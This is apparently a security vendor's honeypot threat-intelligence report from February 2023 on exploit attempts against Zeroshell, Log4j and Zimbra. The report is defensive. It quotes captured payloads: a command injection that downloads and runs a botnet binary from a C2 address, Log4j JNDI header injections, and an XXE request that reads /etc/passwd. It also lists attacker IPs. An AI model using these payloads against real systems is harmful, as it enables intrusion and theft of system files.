Our selection of alerts on honeypots: report 4 – february 2023

These past two weeks, international TEHTRIS honeypots got relentlessly hit again by suspected malicious activities. The honeypots located in Southeast America, in South and Northeast Asia Pacific and in Western Europe were the most targeted. Here is an extract of some of the attack attempts that were detected.

Attempts to exploit CVE-2019-12725 on German and Portuguese honeypots

Two malicious IP addresses have been detected by TEHTRIS NTA performing a Zeroshell remote code execution (RCE) inbound attempt. Indeed, some of our European honeypots could have been compromised through the CVE-2019-12725 (CVSSv3 : 9,8).

The US IP 4.71.37[.]46, hosted by AS 3356 LEVEL3, performed several dozen hits on Germany and Portugal. This IP address is known from public databases identifying malicious IP addresses.

The Chinese IP 36.110.214[.]195, hosted by AS 23724 IDC, China Telecommunications Corporation, is unknown from public databases of malicious IP. This IP performed only one hit on a German honeypot.

This specific URL is the downloading action for Zero botnet.

GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0

URL DECODE : “;cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero;”

The address IP in pink included in the packet above, likely a C2, is a known Portuguese address for exploiting Zeroshell. It is hosted by AS 47674 Net Solutions – Consultoria Em Tecnologias De Informacao, Sociedade Unipessoal LDA.

Log4j exploit attempts on a Swedish honeypot

One of our Swedish honeypots has been the target of loads of “jndirequests that are known for being used in attempts to exploit Log4j vulnerability on devices.

27 IP addresses performed the following headers – which was the most requested upon others:

['origin: $ {jndi:ldap://:8182/a}', 'x-api-version: $ {jndi:ldap://:8182/a}', 'x-att-deviceid: $ {jndi:ldap://:8182/a}', 'proxy-connection: $ {jndi:ldap://:8182/a}', 'prefer: $ {jndi:ldap://:8182/a}', 'accept: */*', 'upgrade-insecure-requests: $ {jndi:ldap://:8182/a}', 'warning: $ {jndi:ldap://:8182/a}', 'a-im: $ {jndi:ldap://:8182/a}', 'x-request-id: $ {jndi:ldap://:8182/a}', 'from: $ {jndi:ldap://:8182/a}', 'forwarded: $ {jndi:ldap://:8182/a}', 'access-control-request-method: $ {jndi:ldap://:8182/a}', 'dnt: $ {jndi:ldap://:8182/a}', 'cache-control: $ {jndi:ldap://:8182/a}', 'x-uidh: $ {jndi:ldap://:8182/a}', 'authorization: $ {jndi:ldap://:8182/a}', 'accept-encoding: gzip', 'x-wap-profile: $ {jndi:ldap://:8182/a}', 'access-control-request-headers: $ {jndi:ldap://:8182/a}', 'x-forwarded-proto: $ {jndi:ldap://:8182/a}', 'pragma: $ {jndi:ldap://:8182/a}', 'date: $ {jndi:ldap://:8182/a}', 'x-forwarded-host: $ {jndi:ldap://:8182/a}', 'x-correlation-id: $ {jndi:ldap://:8182/a}', 'x-requested-with: $ {jndi:ldap://:8182/a}', 'front-end-https: $ {jndi:ldap://:8182/a}', 'http2-settings: $ {jndi:ldap://:8182/a}', 'x-csrf-token: $ {jndi:ldap://:8182/a}']

Other headers performed look exactly the same except for the port number 8182 that changes in a range from 8180 to 8189.

Here are the top 10 IoCs – all known from public databases identifying malicious IPs:

93.91.117[.]60AS 47562 Fast Link LtdRU
120.236.74[.]234AS 9808 China Mobile Communications Group Co., Ltd.CN
85.51.217[.]156AS 12479 Orange Espagne SAES
AS 4766 Korea TelecomKR
72.132.58[.]237AS 20001 TWC-20001-PACWESTUS
178.140.136[.]178AS 42610 RostelecomRU
223.171.91[.]144AS 17853 LGTELECOMKR
46.170.151[.]34AS 5617 Orange Polska Spolka AkcyjnaPL
147.182.233[.]56AS 14061 DIGITALOCEAN-ASNUS

Attempts to exploit CVE-2019-9621 on European honeypots by a Russian IP

Thanks to TEHTRIS NTA that automatically detects any anomaly in the traffic, we monitored an increase in attempts to exploit CVE-2019-9621 (CVSSv3 : 7,5) impacting Zimbra version inferior to 8.8.11 these past two weeks. Indeed, Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows Server-side request forgery (SSRF) and XML External Entity injection via the ProxyServlet component.

The Russian IP address 152.89.196[.]211 (AS 57523 Chang Way Technologies Co. Limited) performed hundreds of actions against all our TEHTRIS European honeypots during this second half of February. This IP identified as malicious in public databases started to attack our honeypots on the 10th of January.

Here is one example of the requests seen in NTA packet:

POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: xx.x.xxx.xx:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Length: 314 Content-Type: application/xml Accept-Encoding: gzip Connection: close <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover>

The line in pink is an attempt to obtain the file/etc/passwd that notably contains the list of the users of the machine.

Attempts to exploit CVE-2019-16759 & CVE-2020-17496 on an Italian honeypot

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots network.

Subscribe to our bi-monthly threat intelligence newsletter

Hardworking Bulgarian threat actors?

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots network.

Subscribe to our bi-monthly threat intelligence newsletter

Masscan, an open-source scanner widely used

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots network.

Subscribe to our bi-monthly threat intelligence newsletter

Information remain TEHTRIS sole property and reproduction is forbidden

TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

No warranty and liability

TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.

Cyber or not Cyber ?

Subscribe to the TEHTRIS newsletter.

Once a month, get the latest cyber news by subscribing to the TEHTRIS newsletter.

To explore the subject

Similar publications

Cyber or not cyber ?

Once a month, receive the essential news and cyber watch by subscribing to the TEHTRIS newsletter.